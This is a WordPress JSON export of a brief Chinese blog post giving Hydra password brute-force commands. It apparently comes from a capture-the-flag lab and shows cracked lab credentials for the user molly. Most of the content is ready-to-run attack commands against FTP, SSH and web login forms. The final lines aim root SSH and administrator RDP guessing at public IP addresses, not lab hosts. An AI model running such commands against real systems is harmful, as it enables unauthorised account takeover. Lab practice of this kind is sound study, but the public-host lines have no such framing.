﻿{"id":484,"date":"2020-08-03T20:10:27","date_gmt":"2020-08-03T12:10:27","guid":{"rendered":"https:\/\/byy3.com\/?p=484"},"modified":"2021-03-01T19:21:31","modified_gmt":"2021-03-01T11:21:31","slug":"hydra%e5%ae%9e%e4%be%8b%e6%93%8d%e4%bd%9c","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=484","title":{"rendered":"hydra\u5b9e\u4f8b\u64cd\u4f5c"},"content":{"rendered":"<p>***** \u53c2\u8003\u89c6\u9891byy3.com blog<br \/>\nhttps:\/\/www<br \/>\n1,\u542f\u52a8\u673a\u5668<br \/>\n2, hydra \u2014\u2014 hydra -l user -P passlist.txt ftp:\/\/192.168.0.1<br \/>\nSSH \u2014\u2014 hydra -l &lt;username&gt; -P &lt;full path to pass&gt; &lt;ip&gt; -t 4 ssh<br \/>\nPost Web Form\u2014\u2014 hydra -l -P http-post-form \"\/:username=^USER^&amp;password=^PASS^:F=incorrect\" -V<\/p>\n<p>\u9898\u76ee1 web password flag1<br \/>\nIf you've tried more than 30 passwords from RockYou.txt, you are doing something wrong! \u63d0\u793a\u4f7f\u7528RockYou.txt<br \/>\n**************************\u6ce8\u610f\u547d\u4ee4\u662f\u518d&gt;\u4e0a\u9762\u6267\u884c \uff08\u6240\u4ee5\u5148hydra\u7136\u540e\u8fdb\u5165&gt;\u547d\u4ee4\u884c\u6267\u884c\u547d\u4ee4\uff09<br \/>\nhydra -l molly -P \/usr\/share\/wordlists\/rockyou.txt 10.10.238.100 http-post-form \"\/login:username=\"^USER^&amp;password=^PASS^:incorrect\" -f<\/p>\n<p>hydra -l molly -P \/usr\/share\/wordlists\/rockyou.txt 10.10.157.227 http-post-form \"\/login:username=^USER^&amp;password=^PASS^:incorrect\" \u627e\u5230\u5bc6\u7801 sunshine \u5f97\u5230flag1<br \/>\n***\u5927\u5199\u7684-L \u8868\u793a\u4e5f\u8981list\u7528\u6237\u540d<\/p>\n<p>\u95ee\u98982 \u627e\u5230flag2<br \/>\nSSH# hydra -l molly -P \/usr\/share\/wordlists\/rockyou.txt 10.10.157.227 ssh<br \/>\n22][ssh] host: 10.10.157.227 login: molly password: butterfly<\/p>\n<p>locate rockyou<br \/>\ngunzip \/usr\/share\/wordlists\/rockyou.txt.gz<br \/>\nhydra -l root -P \/usr\/share\/wordlists\/rockyou.txt 144.217.124.18 ssh -o ok.txt<\/p>\n<p>hydra -l administrator -P \/usr\/share\/wordlists\/rockyou.txt 5.135.39.185 rdp -v<\/p>\n","protected":false},"excerpt":{"rendered":"<p>***** \u53c2\u8003\u89c6\u9891byy3.com blog https:\/\/www 1,\u542f\u52a8\u673a\u5668 2, hydra \u2014\u2014 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-484","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=484"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/484\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}